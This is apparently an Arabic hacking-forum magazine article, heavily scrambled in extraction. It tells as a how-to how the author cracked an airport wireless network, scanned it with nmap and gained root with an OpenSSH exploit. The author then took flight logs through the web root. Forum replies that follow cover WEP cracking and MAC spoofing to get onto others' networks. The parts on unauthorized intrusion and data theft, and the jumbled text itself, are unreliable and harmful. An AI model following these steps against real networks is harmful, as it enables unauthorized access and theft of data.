‪ Configure‬تبع كرت الشبكة لدي في نظام‬ ‫اكثر‪                                         ‬‬ ‫انظر الى التعديلت لكي تفھم ر‬ ‫الشبكة‪     ‬‬ ‫ة‬ ‫في الخطوة التالیة سوف اعطل مفاتیح التشفیر لعدم وجودھا في‬ ‫المراد اختراقھاا‪                                                          ‬‬ ‫الن في حال كانت بروتكول ‪DHCP‬مفعل سوف اصبح داخل الشبكة فورا ‪   ...‬‬


‫البروتكول‪   ‬‬ ‫ل‬ ‫رجاع درس الخ سايلنت نیدل حول ھذا الموضوع كیفیة تفعیل ھذا‬ ‫على‪    ‬‬ ‫ماھ و كل شارحه الخ في التفصیل بالمناسبة اوجه تحیة لخ سايلنت ى‬ ‫كذا‪ ‬‬ ‫جھ وده معي من فترة قديمة لما كنت في بدايتي ‪..‬وقتھا كان اسمي غیر ا‬ ‫حیعرفني‪                                                ‬‬ ‫ي‬ ‫عشان كده مش‬ ‫‪                                       001‬‬ ‫ياحلوته ياجماله والكونكشن ‪0 %‬‬ ‫‪                               ..‬‬ ‫الن بعد التصال لم تظھر اي رسائل خطاء ‪.‬‬ ‫‪                                   071‬‬ ‫الشبكة‪                                ‬‬ ‫ة‬ ‫الن خلینا نشوف ھل انا اصحبت في‬ ‫التالي‪                                ‬‬ ‫ي‬ ‫شغلت محث الدوس ورحت كاتب المر‬ ‫كود‪                                                                           :‬‬ ‫د‬ ‫‪                                                                   C:\>ipconfig‬‬ ‫‪                                          Windows 2000 IP Configuration‬‬ ‫‪                                                Ethernet adapter Wireless:‬‬ ‫‪                  Connection­specific DNS Suffix . : host.atc.state.ca.us‬‬ ‫‪                             IP Address. . . . . . . . . . . . : 192.168.1.103‬‬ ‫‪                           Subnet Mask . . . . . . . . . . . : 255.255.255.0‬‬ ‫‪                             Default Gateway . . . . . . . . . : 192.168.1.1‬‬ ‫الداخل‪                                                      ‬‬ ‫ل‬ ‫جمیل جدا انا في‬ ‫كود‪                                                                           :‬‬ ‫د‬ ‫‪                                    C:\>ping www.grandideastudio.com‬‬ ‫‪  Pinging www.grandideastudio.com [216.127.70.89] with 32 bytes of‬‬ ‫‪                                                                          data:‬‬ ‫‪            Reply from 216.127.70.89: bytes=32 time=80ms TTL=241‬‬ ‫‪            Reply from 216.127.70.89: bytes=32 time=70ms TTL=241‬‬ ‫‪            Reply from 216.127.70.89: bytes=32 time=70ms TTL=241‬‬ ‫‪            Reply from 216.127.70.89: bytes=32 time=80ms TTL=241‬‬ ‫‪                                         Ping statistics for 216.127.70.89:‬‬ ‫‪                   Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),‬‬ ‫‪                          Approximate round trip times in milli­seconds:‬‬ ‫‪                 Minimum = 70ms, Maximum = 80ms, Average = 75ms‬‬ ‫الـ‪ ping ‬وياريتھا‬ ‫من خللكم اوجه تحیة لمزود الخدمة السوري لمنعھم خدمة ـ‬ ‫الشئ‪ ‬‬ ‫ئ‬ ‫وقفت علیھا شو بدي عدلكم لعدلكم ‪...‬يجیلھم يوم من واحد كسلن‬ ‫الجمیل اني لست فقط عضو في الشبكة بل حصلت على النترنت عن طريق‬ ‫ق‬ ‫الشبكة‪                                                                        ‬‬ ‫ة‬ ‫بعد الدخول لم اكتفي بھذا بل اصبح بداخلي ھاجس لمعرفة ماھي المعطیات‬ ‫ت‬ ‫الشبكة‪                                           ‬‬ ‫ة‬ ‫التي يتم ارسالھا عبر ھذه‬ ‫عبر‪   ‬‬ ‫شغلت‪AiroPeek NX ‬عبارة عن شاشة مراقبة للباكیت المرسلة ر‬ ‫ت‬ ‫لذلك‬ ‫نسمیه‪                                 Sniifer ‬‬ ‫ه‬ ‫الشبكات السلكیة شنو كنا‬ ‫‪                                   171‬‬ ‫يعمل‪                                 ‬‬ ‫ل‬ ‫مارايك بان ترى صورة للبرنامح وھو‬ ‫ي‪       ‬‬ ‫وانا اراقب لحظت ان شخصا قام بفتح خدمة الـ ‪FTP‬ھنا برقت عیناي‬ ‫فكرت بان قد يكون اتصل بشبكة اخرى لست في مجالھا او لنفرض انھا شبكة‬ ‫ة‬ ‫لسلكیة وقلت لنفسي عن طريق الـ ‪ FTP‬اقدر ادخل علیھا واكشف الشبكات‬ ‫ت‬ ‫كاملة‪                                                                 ‬‬ ‫ة‬ ‫المزيد‪                                     ‬‬ ‫د‬ ‫تركت السنیفر يعمل لیتلتقط‬ ‫ل‪ ‬‬ ‫من جھازي ولن نظامي كان ويندوز شغلت ‪ Cygwin,‬عبارة عن يونكس شل‬ ‫للشبكة‪                                     ‬‬ ‫ة‬ ‫وقررت معرفة الرينج الكامل‬ ‫ى‪  ‬‬ ‫وشغلت ‪ Nmap‬شرحھا اخوي ‪ B­Hunter‬شرح ول اروع ترقوه في المنتدى‬ ‫التي‪                                                   ‬‬ ‫ونفذت الكوماند ي‬ ‫‪                                271‬‬


bash­2.02$ nmap ­sS ­O ­oN scan 192.168.*.*                                                    bash­2.02$ cat scan # nmap (V. 3.00) scan initiated Mon Mar 17 22:32:28 2003 as: nmap ­                                                                        sS                Interesting ports on SPANDEX O ­oN scan 192.168.*.*                                                        (192.168.1.102):    (The 1595 ports scanned but not shown below are in state: closed)                                                       Port State Service                                                    135/tcp open loc­srv                                               139/tcp open netbios­ssn                                              445/tcp open microsoft­ds                                              1025/tcp open NFS­or­IIS                                           1026/tcp open LSA­or­nterm                                                       1027/tcp open IIS          Remote OS guesses: Windows NT 5 Beta2 or Beta3, Windows                                                               Millennium      Edition (Me), Win 2000, or WinXP, MS Windows2000 Professional                                                                RC1/W2K                                                  Advance Server Beta3                                  Interesting ports on (192.168.1.109):    (The 1588 ports scanned but not shown below are in state: closed)                                                       Port State Service                                                          21/tcp open ftp                                                         22/tcp open ssh                                                       25/tcp open smtp                                                    53/tcp open domain                                                        80/tcp open http                                                     110/tcp open pop­3                                                    143/tcp open imap2                                                     199/tcp open smux                                                      443/tcp open https                                                     993/tcp open imaps                                                    995/tcp open pop3s                                   173                                                     3306/tcp open mysql                                                 5432/tcp open postgres                Uptime 35.940 days (since Mon Feb 10 00:12:59 2003)   ‫كان‬ ‫البوكس الول الذي اكتشفته الداة كان يحوي نظام ويندوز من الخدمات ن‬                                                                   .. ‫مبین‬ ‫ن‬   ‫ذه‬ ‫ وغیره لنه كل ھ ه‬FTP ‫والـ‬ ‫والبوكس الخر اعتقدت انه مان لخدمات المیل ـ‬                                                 ... ‫مفتوحة‬ ‫ة‬ ‫الخدمات كانت‬ ‫لذلك‬.. ‫ورايت بان المضیف الثاني يجدذبني اكثر بسب الخدمات الموجوده فیه‬ ‫ك‬                                                         ‫باللعبة‬ ‫ة‬ ‫ققرت البدء‬   ‫للبوكس‬ ‫س‬ ‫ورايت من الفضل ان اخترق البوكس الثاني واذا زاد لدي وقت ارجع‬                                                                       ‫الول‬ ‫ل‬  ‫ تعطیك امتیازات الرووت لذلك قررت البدء فیھاا‬SSH ‫لخدمة‬ ‫ة‬ ‫كان لدي استثمار‬                                                                       :‫كود‬ ‫د‬                                     bash­2.02$ telnet 192.168.1.109 22                                                                       :‫كود‬ ‫د‬                                         Connecting To 192.168.1.109...


Escape character is ‘^]’.                                                   SSH­2.0­OpenSSH_3.4               ‫جوم‬ ‫يالھي النسخة الموجودة كان فیھا الخطاء وكانت عرضة للھ م‬                                                                       :‫كود‬ ‫د‬                                                  bash­2.02$ cd /gobbles                                  bash­2.02$ ./ssh –l root 192.168.1.109                                          [x] remote host supports ssh2 Protocol major version differ: 2 vs. 1[*] remote host supports ssh2[*]    server_user: root:key[*] keyboard­interactive method available[*]    chunk_size:4096 tcode_rep: 0 scode_rep 60[*] mode: exploitation                            ....PpppPppppPppPpPppPppPpppPppPpp . . .                                                                  GOBBLE                                     OpenBSD tux 4.0 GENERIC#94 i386                            uid=0(root) gid=0(wheel) groups=0(wheel)                                    174                                                                 # whoami                                                                      root                                                     ‫السیرفر‬ ‫ر‬ ‫على‬# ‫اخذت‬      ‫ت‬ ‫بعد الحصول على الرروت قررت الحصول على ايع معلومات تفیدني وقرر ت‬                                   ‫البوكس‬ ‫س‬ ‫معرفة لماذا كان يستخدمون ھذا‬                                                   log l .. ‫قررت مشاھدة الـ‬                                                                      :‫كود‬ :                                                 # cat /tmp/dispatch.log                                                                      :‫كود‬ :                                          DISPATCH LANDING REPORT                                                           AIRPORT TIME      DATE FLIGHT DEPART ARRIVE DEPART ARRIVE A IRCRAFT MILES                       508 MAR9 TRS498 FLL YYZ 21:43 0:01 T/B712/E                     835 MAR9 MRA833 AVP YYZ 23:11 0:13 T/MD80/A                        37 MAR9 SWA234 MHT YYZ 22:03 0:22 C208/G                     7441 MAR9 COA426 IAH YYZ 21:29 0:25 T/B737/R                     641 MAR9 DAL2120 CVG YYZ 23:00 0:31 T/E145/I                     836 MAR9 AAL3170 BWI YYZ 22:27 0:43 T/B752/E                      272 MAR9 BTA3490 BOS YYZ 0:02 0:46 T/B739/E                        621 MAR9 USA618 ABQ YYZ 23:50 0:52 C208/A                      052 MAR9 MTN7454 PHL YYZ 0:18 0:58 T/B733/R      ‫من‬ ‫كمنت الى سجلت الطیران كنت اتمتم يالي ن‬,, ‫كان الملف يبدوا مثیرا‬                                                                    ‫فضولي‬ ‫ي‬  ‫المتصفح‬ ‫ح‬ ‫قررت القاء نظرة على المحتوى طبعا لم افضل الدخول فورا عن طريق‬                                               >/901.1.861.291//:<http                                ‫وغیرھا‬log ‫للتفادي من الكتشاف بملفات الـ‬             log l ‫الناس تحب بطبیعة الحال ان تشیك كل فترة على ملفات الـ‬  ‫فیشك‬ ‫ك‬ ‫على الرغم ان طول فترة التصال بالشبكة كنت مجھ ول لاريد فعل حركة‬                                     ‫اخرى‬ ‫ى‬ ‫بي من يعرف قد اقرر الرجوع مرة‬ / /var/www/html ‫*ورفعتھم على الدلیل‬.*tar ‫ضغطت المور التي اريدھا بضغط‬                                                 ‫ازي‬ ‫ومنھا رفعتھم على جھ ي‬            ‫ي‬ ‫في نظام ويندوز انه مجاني‬GuildFTPd ‫سحبتھم عن طريق برنامج‬  ‫ق‬ ‫وعیوني لم تصدق‬nondescript tmped0.gif ‫وانا استعرض الملفات رايت صورة‬                                   571                                                                        ‫ماريت‬ ‫ت‬


‫نفسي‪                         ‬‬ ‫ي‬ ‫ھل ھذا نوع من التحكم اللي بالطیران سالت‬ ‫يقول‪                                                           ‬‬ ‫ل‬ ‫سمعت صوتا‬ ‫ايھا السیدات والسادة جھ زوا انفسكم للرحلة القادمة احملو بطاقتكم تاكدوا من‬ ‫ن‬ ‫السفر‪                                                               ‬‬ ‫ر‬ ‫جوازات‬ ‫لدي‪   ‬‬ ‫اللعنة كنت اريد مشاھدة نظام الملحة وحفظه عندي لكن لسف لیس ي‬ ‫تعید‪        ‬‬ ‫بوضعیة‪hibernate mode, ‬حیث عندما د‬ ‫ة‬ ‫الوقت للذلك حفظت الجھاز‬ ‫الجارية‪     ‬‬ ‫ة‬ ‫تشغیل الجھ از يكون كما لو كان شغال يعني يحفظ لك كل العملیات‬ ‫بالطائرة‪.. ‬‬ ‫ة‬ ‫سارعت بوضح المحمول في حقیبتي والصحیفة ايضا وانتقلت للركوب‬ ‫السماء صديقة ‪..‬المواج المنطلقة من الشبكات والجھزة المحملة وغیرھاا‪     ‬‬ ‫الوقت‪ ‬‬ ‫ت‬ ‫على كل حال كرسي المغطى بالقماش البیض ساعد على امضاء بعض‬ ‫المفید‪                                                                 ..... ‬‬ ‫د‬ ‫كود‪                                                                         :‬‬ ‫د‬ ‫‪                                                                 References‬‬ ‫‪               Network Stumbler, <http://www.netstumbler.com/> 1.‬‬ ‫‪       S. Fluhrer, I. Mantin, and A. Shamir,“Weaknesses in the Key 2.‬‬ ‫‪                                Scheduling Algorithm of RC4,” Aug. 2001,‬‬ ‫>‪  <http://www.wisdom.weizmann.ac.il/~itsik/RC4/Papers/Rc4_ksa.ps‬‬ ‫‪  N. Borisov, I. Goldberg, and D.Wagner, “(In)Security of the WEP 3.‬‬ ‫‪              Algorithm,” www.isaac.cs.berkeley.edu/isaac/wep­faq.html‬‬ ‫>‪                <http://www.isaac.cs.berkeley.edu/isaac/wep­faq.html‬‬ ‫‪                    WEPCrack, <http://wepcrack.sourceforge.net/> 4.‬‬ ‫‪                             AirSnort, <http://airsnort.shmoo.com/> 5.‬‬ ‫‪                                            WildPackets AiroPeek NX, 6.‬‬ ‫>‪                   <http://www.wildpackets.com/products/airopeek_nx‬‬ ‫‪                                Cygwin, <http://www.cygwin.com/> 7.‬‬ ‫‪                           Nmap, <http://www.insecure.org/nmap> 8.‬‬ ‫‪     OpenSSH Challenge­Response Buffer Overflow Vulnerabilities , 9.‬‬ ‫>‪                               <http://www.securityfocus.com/bid/5093‬‬ ‫‪                               GuildFTPd, http://www.guildftpd.com/ 10.‬‬ ‫عملیة‪                                    .. ‬‬ ‫ة‬ ‫ارجو انكم تكونوا استفدتوا بتجربة‬ ‫مخترقا‪    ‬‬ ‫ا‬ ‫صحیح القصة خیالیة بس لو انك اتبعت الطريقة التالیة ستجد نفسك‬ ‫‪                                      176‬‬ ‫‪                                               ....‬‬ ‫شبكة بل ومسیطر علیھا ‪.‬‬ ‫اي‪  ‬‬ ‫تنبیه انك دخلت للشبكة لس معناه انك سیطرت علیھا ‪..‬يعني مثلك مثل ي‬ ‫‪                                                     ..‬‬ ‫عضو لیس له صلحیة ‪.‬‬ ‫‪                                                            Hacking is Easy‬‬ ‫‪                           I wanna send a Bigger greetZ to all My Frinds‬‬ ‫‪                                      Syrian Hacker ,, AlNary ,, B­Hunter‬‬ ‫ورواء‪       ‬‬ ‫ء‬ ‫السیناريو الثاني تعقب الثر ‪..‬اتركوني بس لكمل القصة على ھدوء‬ ‫‪                                 Snort­Wireless‬‬ ‫‪S‬‬ ‫شباب شیكوا على مشروع‬ ‫‪                                      >/<http://www.snort­wireless.org‬‬ ‫‪                                                       ..‬‬ ‫شوفوه وردولي خبر ‪.‬‬ ‫اما عن السئلة التي تسال فسوف افتح لھا موضوعا خاص عشان نجاوب علیھا‬ ‫‪                                                             ....‬‬ ‫كلھ ااااااااااااا ‪.‬‬ ‫‪                   ...‬‬ ‫مع انه الى النالسئلة التي سالت اجوبتھا بین السطور ‪.‬‬ ‫‪                                         ...‬‬ ‫بالنسبة للسوال الول الذي طرح ‪.‬‬ ‫ت‪  ‬‬ ‫عناون الماك ادرس برنامج الـ ‪ NetStumber‬يطلعلك ياه ‪...‬راجع درس الدوات‬ ‫كويس‪                                                               ‬‬ ‫س‬ ‫‪..‬واقراه‬ ‫ذا‪    ‬‬ ‫اما اسوال الثاني بماانك قريب جدا من الشبكة لدرجة ان الكرت يلقطھا فھ ا‬ ‫يعني انك تعرف معرف الخدمة بتاع الشبكات الي انت لقطھا وعیش حیاتك واذاا‬


‫لم ينفع علیك بالماك والقراءة الجیدة لھذه الدروس وغیرھاا‪                      ‬‬ ‫النقاشات‪                                                                    :‬‬ ‫‪:‬‬ ‫قصة جدا جمیلة ‪,‬بالحقیقة انا عايش نفس القصة بس مو بالمطار والقصة ھي ‪:‬‬ ‫ان‪                                                                    :‬‬ ‫يحكى ‪:‬‬ ‫يملك‪  ‬‬ ‫ك‬ ‫انا في يوم من اليام كنت جالس مع صديقي في المكتب وصديقي كان‬ ‫بواسطة‪ ‬‬ ‫ة‬ ‫منظومة انترنت ويقوم بتوزيع النترنت في المنطقة عن طريق الويرلس‬ ‫الكسس بوينت أي يعمل الكسس بوينت ‪ client‬وانا كنت عارف البسويردد‪      ‬‬ ‫اللي‪   ‬‬ ‫مالت الروتر تبع صديقي وفتحت الروتر وقمت بالحث عن الماكات ادريس ي‬ ‫ماك‪     ‬‬ ‫مسموح لھ ا بالدخول فوجدت حاسبة غريبة تحاول الدخول اقصد وجدت ك‬ ‫ابتاعي‪       ‬‬ ‫ي‬ ‫غريب فقمت بتسجیل الماك وذھبت الى البیت وشغلت الحاسبة‬ ‫طريق‪      ‬‬ ‫ق‬ ‫وقمت بتزوير الماك ادريس ودخلت على الكسس بوينت ابتاعي عن‬ ‫ابتاعي‪     ‬‬ ‫ي‬ ‫كتابة الي بي ادريس في النترنت اكسسبلورر وثم كتبت البسويرد‬ ‫ت‪       ‬‬ ‫وعملتھا ‪ client‬وقمت بعمل ‪ scan net‬واخترت المنظومة المقصودة وقمت‬ ‫‪                                    771‬‬ ‫بالتفعیل ثم عملت ‪ log‬وفي الحظة اصبحت داخل المنظومة واذا بالیاھو‪          ‬‬ ‫نتستمبلر‪  ‬‬ ‫ر‬ ‫مسنجر يعمل ‪ .‬السؤال اللي اريد ان اطرحه على الخوة ھ و برنامج‬ ‫او‪   ‬‬ ‫ھل يكشف الماك ادريس ابتاع الحاسبات اللي تعمل على ھذه المنظومة و‬ ‫وشكرا‪            ‬‬ ‫ا‬ ‫تلك ام يقوم بالكشف عن الماك ادريس ابتاع المنظومة فقط ؟‬ ‫اخي الكريم ‪..‬برنامج الـ ‪NetStumber‬يرعض لك الماك ادرس بتاع الجھاز الــ‪    ‬‬ ‫ي‪  ‬‬ ‫‪Server‬او الرئیسي ‪..‬شعان تعرف النطاقات الشغالة علیھا الشبكة ‪...‬يعني‬ ‫بالحاسبات‪          ‬‬ ‫ت‬ ‫على حیك ‪..‬يشكف الماك بتاع المنظمومة ‪..‬لني انا مالي‬ ‫الشغالة وامر مستحیل اعرفھاا‪                                                 ‬‬ ‫‪                                                                 2­KAMRAN‬‬ ‫؟؟؟‪                    ‬‬ ‫كیف اعرف ارقام الماك ادرس الموثوقه عشان اقدر ازورھا ؟‬ ‫للینكس‪                               ‬‬ ‫س‬ ‫عن طريق برنامج ‪NetStumber‬او ‪Kimset‬‬ ‫ج‪                                                             ‬‬ ‫‪3‬قیس علي اج‬‫ي‪               ‬‬ ‫ممكن اعرف الفرق بین ‪aircrack‬و ‪airodump‬والثنان يعملن في‬ ‫ن‪           ‬‬ ‫‪wzcook‬ممكن اخي تشرحلي كیفیة العمل علیھما وھل ھما يعملن‬ ‫ممكن‪               ‬‬ ‫ن‬ ‫في الوندوز ؟ طبعا حسب ما قراءة يعملن في الوندوز لكن‬ ‫المنتدى‪            ‬‬ ‫ى‬ ‫تشرحلي كیفیة العمل علیھ ما واكون ممتن لك والخوة في‬ ‫نعم بامكانك المعرفة ‪.. AirCrack‬تقوم بعمل كسر بالقوة العنیفة ‪..‬للتشفیر ‪...‬‬ ‫ق‪            ‬‬ ‫اما الـ ‪AirDump‬فستخدمھما عندما تكون عضو بالشبكة عضو موثوق‬ ‫‪   Read The F****** Manual‬‬ ‫‪R‬‬ ‫اشرح لك كیفیة العمل علیھما ‪..‬ھل اقول لك‬ ‫‪                                                                   4­WaNeS‬‬ ‫الدخول‪        ‬‬ ‫ل‬ ‫في المنطقة التي أنا فیھا توجد شبكتین لسلكیة وطبعً حاولت‬ ‫اا‪                        ‬‬ ‫كرت‪          ‬‬ ‫علیھا لكن طلب مني الیوزر والباسورد لكل شبكة أسم يكتشفھا ت‬ ‫معقول‪        ‬‬ ‫ل‬ ‫الشبكة من دون أدوات بحكم قربھا وأعتقد أن الباسورد أكتشافه‬ ‫ذه‪             ‬‬ ‫لنه عند عمل شبكة لسلكیة يطلب منك كلمة وعلى حسب ھ ه‬ ‫لء‪           ‬‬ ‫الكلمة يقوم بأعطائك خیارات للباسورد فھل ھذا الباسورد متغیر أم ء‬ ‫ل‪            ‬‬ ‫جھاز الشبكة ‪Wireless­G ADSL Gateway ­ WAG54G‬طبعً أسئل‬ ‫اا‪                    ‬‬ ‫جدار‪            ‬‬ ‫ر‬ ‫للستزادة فقط واالله يغنینا بحللة عن حرامه وأعتقد بأنه ھناك‬ ‫اا‪                                      ‬‬ ‫ر‪                                      ‬‬ ‫حماية للتصدي لمحاولت الختراق وشك ًر‬ ‫‪                                        871‬‬ ‫ى‪ ‬‬ ‫اول مالك ومال جدار الحماية بعدين اسمه ‪Firewall‬ھذا بعد ان تسیطر على‬ ‫قبل‪                                    ‬‬ ‫الشبكة تحاول تحسب حسابه مش ل‬ ‫ثانیا بما ان كرت الشبكة يلقط الشبكات معناه انتم بمداھا ‪001%‬كل ماعلیك‬ ‫ك‬ ‫جمة‪                                   ‬‬ ‫استخدام الطرق المشروحة ‪..‬للماھ ة‬


‫ج‪                                                          ‬‬ ‫‪5‬قیس علي اج‬‫او‪         ‬‬ ‫اخي بالنسبة للبرنامج ‪netstumbler‬ھل يعمل مع ‪ access point‬و‬ ‫ج‪        ‬‬ ‫‪wireless card‬فانا امتلك اكسس بوينت وعندما اعمل على البرنامج‬ ‫رابط‪      ‬‬ ‫المذكور واعمل سكان يخرج عبارة ليوجد كارد ويرلس علما انه انا ط‬ ‫اكسس بوينت فما العمل ؟ الوندوز المستخدم اكس يي سیرفز باك ‪     2‬‬ ‫‪                                           B­Hunter‬‬ ‫‪B‬‬ ‫الجابة اتت من اخي‬ ‫الكروت‪       ‬‬ ‫ت‬ ‫ھو خاص بالكروت لنه يدور على الكسس بوينت ما يدور على‬ ‫وبیشتغل‪               ‬‬ ‫ل‬ ‫لو كان بجھ ازك كرت قم بتفعیل الكرت وشغل البرنامج‬ ‫الطلق‪                             ‬‬ ‫ق‬ ‫ل دخل للبرنامج بالكسس بوينت على‬ ‫منه‪                                               ‬‬ ‫لنه يبحث عنه ل يبحث ه‬ ‫اللقاء‪                                                                 ‬‬ ‫ء‬ ‫الى‬ ‫‪                                                              6­B­Hunter‬‬ ‫‪           0022‬‬ ‫‪0‬‬ ‫يا سلكر انا ابي اي برنامج يقدر يتعرف على تشیب النتل‬ ‫المشكله انه كل البرامج "في لینكس "تتعرف علیه بشكله الحقیقي ""‪   ‬‬ ‫مثل‪   ‬‬ ‫تشیب ولیس كرت "ولذلك ما يدعموه وخصوصا كیسمیت "بالظبط ل‬ ‫اللقاء‪         ‬‬ ‫ء‬ ‫مشكلة الوين مودم سوفت ولیس ھارد "عندك حل ؟ الى‬ ‫على‪   ‬‬ ‫مثل ماقلتلك مشلكة الوين مودم او الكروت الداخلیة على اتي تركب ى‬ ‫ي‪   ‬‬ ‫مداخل ‪PCI‬بان قیادتھا لتكون ھ اردوير بل سوفت وير ‪..‬يعني النظام الي‬ ‫يشوف تعريف التشیب مايقدر يقود الكرت ‪..‬بل يجب ان يكون ھناك تعريف ‪...‬‬ ‫والحل ‪.‬اما ان تبرمج برنامج قیادة او تنتظر دعم للكرت تبعك ‪..‬او تدور اذا كان‬ ‫ن‬ ‫ئ‪                           ‬‬ ‫ھناك ‪plugins‬انا صراحة مادورت على ھیك شئ‬ ‫‪                                                                   7­zdce‬‬ ‫ي‪      ‬‬ ‫السلم علیكم ‪0000000000001‬شكر الك خیو على ھالموضوع الي‬ ‫ويا‪      ‬‬ ‫واالله اكثر من قمه وبتمنا انه ھالموضوع ما يوصل لحد معین ونوقف ا‬ ‫‪                                   971‬‬ ‫كمان‪            ‬‬ ‫ن‬ ‫حبذا اخي تسترسل بالشرح لنه موضوووع حلو كثیر وممتع‬ ‫برنامج‪                      ‬‬ ‫ج‬ ‫اخووووي ممكن اتساعدني وتحكیلي كیف اركب‬ ‫ه‪      ‬‬ ‫السكان ‪Network Stumbler‬ركبته على ويندوز اكس بي بس المشكله‬ ‫ع‪      ‬‬ ‫ايضل يحكییلي ‪No wireless adaoter found‬شفلك حل لحلمشكله مع‬ ‫عندي‪        ‬‬ ‫ي‬ ‫العلم اني شابك نت عن طريق اللسلكي وكمان كرت الشبكه‬ ‫‪Macronix‬وكمان اذا ما بنفع ھ اد موجود كرت شبكه انتل والخوه ماا‪         ‬‬ ‫بالشرح‪                              ‬‬ ‫ح‬ ‫تبخلو بالرد ملحظه ارجو السترسال‬ ‫‪           ...‬‬ ‫ياحبیبي الحل الناھ ئي لمشكلتك انك تعرف كرت الشبكة عندك ‪.‬‬ ‫او قك بالغاء التعريف ومن ثم عرف وشغل الكرت وشغل البرنامج وقتھا يلقط انه‬ ‫ه‬ ‫‪                                       Scan‬‬ ‫‪S‬‬ ‫عندك كرت شبكة ‪..‬وابدا بالـ‬ ‫ج‪                                                          ‬‬ ‫‪8‬قیس علي اج‬‫ع‪      ‬‬ ‫شكرا على الرد السريع ‪,‬اخي بالنسبة للبرنامج ‪airesnort‬وجدت بموقع‬ ‫ل‪       ‬‬ ‫البرنامج الرسمي بتنه يعمل مع الوندوز ‪xp‬فھل ھناك احد جرب العمل‬ ‫على‪         ‬‬ ‫به على الوندوز وشكرا ‪,.‬انا حالیا سوف احاول تجريب العمل به ى‬ ‫‪                                                              xp‬‬ ‫الوندوز ‪x‬‬ ‫لنظام‪ ‬‬ ‫م‬ ‫اخي انا مجربه على لینكس لكن باان الشركة نفسھا عامل نسخة منه‬ ‫ئ‪                                             ‬‬ ‫‪Windoze‬معناه نفس الشئ‬ ‫ج‪                                                          ‬‬ ‫‪9‬قیس علي اج‬‫ل‪       ‬‬ ‫اخي العزيز ما راءيك بالداة ‪aircrack‬ھل ھي اداة جديدة ويمكن العمل‬ ‫المعلومات‪       ‬‬ ‫ت‬ ‫بھ ا في بییئة الوندوز وشكرا على الجابة مقدما‪.‬ويمكن بعض‬ ‫وان‪            ‬‬ ‫عنھ ا من خلل تجربتك الشخصیة مع ھذه الداة ان كنت سبق ن‬ ‫تعاملت معھا ‪                                                          ..‬‬ ‫اخي انا مش مھمتي اني اشرح ‪Tool ...‬الداة جیدة في مجال كسر التشفیر‬ ‫ر‬ ‫‪     Readme‬‬ ‫‪R‬‬ ‫‪WEP .....‬ويمكن الستغناء عنھا واستعامل ‪WEPCrack ....‬والـ‬ ‫موجود‪                                                                  ‬‬ ‫د‬


‫_________________________________________________________‬ ‫_________________________________________________________‬ ‫_________________________________________________________‬ ‫_________________________________________________________‬ ‫‪                                   081‬‬ ‫‪                         ssh‬‬ ‫ة ‪s‬‬ ‫برتوكول القشرة المنة‬ ‫‪                                                          Linux­root‬‬ ‫‪L‬‬ ‫للكاتب‪:‬‬ ‫‪                                                   ssh‬‬ ‫برتوكول القشرة المنة ‪s‬‬ ‫ض‪  ‬‬ ‫تم تطوير برتكول القشرة المنة ‪ ssh or secure shll‬كبرتكول ارسال منخفض‬ ‫الشبكة‪   ‬‬ ‫ة‬ ‫المستوى امن ويتیح للمستخدم تسجیل دخوله لكمبیوتر بعید عبر‬ ‫لخر‪                              .‬‬ ‫‪.‬‬ ‫وتنفیذ اوامر فیھا ونقل ملفات من كمبیوتر‬ ‫الفاية من ‪ssh‬ا يحل محل ‪ telnet­rcp­rsh­rlogin‬في الكمبیوترات المتوافق مع‬ ‫ع‬ ‫‪             ftp‬‬ ‫‪Linux‬لتزويدھا بأرسال امن للملفات تم تطوير ‪2 ssh‬كبديل للــ ‪f‬‬ ‫تقنیة ‪ ssh‬تحمي التصالت عبر النترنت بتشفیر كلمات المرور والبینات‪      ..‬‬ ‫ة‪   ‬‬ ‫يزود ‪ ssh‬تحقق لصحة المضیف والمستخدم وضغطا للبینات وحماية لسرية‬ ‫نظام‪      ‬‬ ‫م‬ ‫البینات وتشفیر قوي للمعلومات ‪.‬لكنه لیس مصمما لیحمي عیوب‬ ‫التشغیل‪                                                                   .‬‬ ‫‪.‬‬ ‫يتكون برتكول اقشرة المنة ‪ ssh‬من ثللث مكوناة رئیسیة‪                    ::‬‬ ‫‪                                          ssh­trans‬‬ ‫‪s‬‬ ‫‪1‬برتكول طبقة الرسال‬‫ل‬ ‫الشبكة‪                                    .‬‬ ‫‪.‬‬ ‫يزود تحققا امن وسرية وسلمة‬ ‫‪                        ssh­userauth‬‬ ‫‪s‬‬ ‫‪2‬برتكول التحقق من صحة المستخدم‬‫م‬ ‫الرسال‪    .‬‬ ‫‪.‬‬ ‫يتحقق من صحة المستخدم من جھة العمیل ويعمل فوق طبقة‬ ‫‪                                                  Ssh conn‬‬ ‫‪S‬‬ ‫‪3‬برتكول التصال‬‫ل‬ ‫صحة‪  ‬‬ ‫ة‬ ‫يرسل تعقیبا مشفر في عدة منظقیة ويعمل فوق برتكول التحقق من‬ ‫المستخدم‪                                                                 .‬‬ ‫‪.‬‬ ‫ويحمي ‪ ssh‬ايضا من الخطار التالیه‪                                        ::‬‬ ‫‪1‬تزوير الرزم‪                                                               ..‬‬‫المضیف‪                                                         .‬‬ ‫‪.‬‬ ‫‪2‬تزوير ‪Ip‬‬‫التنصت‪                                                                  .‬‬ ‫‪.‬‬ ‫‪3‬‬‫‪                                   181‬‬ ‫ل‪                         ‬‬ ‫شرح ‪ Ssl‬الجزء الول‬ ‫‪                                                         Acid Burn‬‬ ‫‪A‬‬ ‫للكاتب‪:‬‬ ‫=====================‪                                       ‬‬ ‫‪                                                :INTRODUCTION TO SSL‬‬ ‫=====================‪                                       ‬‬ ‫طبعا اكید فى يوم و انت تتصفح النترنت و اتصلت بأى موقع عن طريق الصدفه‬ ‫ه‬ ‫ه‪ ‬‬ ‫فأنك تلحظ ما يسمى بال ‪ PADLOCK ICON‬و ھى عباره عن ايقونه موجوده‬ ‫فى الشريط فى اسفل متصفحك و ھى تكون عباره عن علمه تعجب ! صفراءء‬ ‫ك‪            ‬‬ ‫او علمه ‪ X‬حمراء و لھ ا اشكال اخرى كثیره تختلف حسب متصفحك‬ ‫العلمه؟‪                                    ‬‬ ‫؟‬ ‫و الن سؤالنا ھو ماذا تعنى ھذه‬ ‫و الجابه ان ھذه العلمه تعنى ان ھذا الويب محمى ب ‪ ssl‬اى طبقه امنیه و‪  ‬‬ ‫كما ھو ظاھر فى العنوان ان ال ‪ ssl‬ھى ال (‪ (Secure Sockets Layer‬و ھى‪  ‬‬ ‫تفعل‪  ‬‬ ‫ل‬ ‫تشیر الى بروتوكول او تیكنیك معین يؤكد التصال المن بالويب سیت و‬ ‫ه‪    ‬‬ ‫ھ ذا بطريقتین ‪ 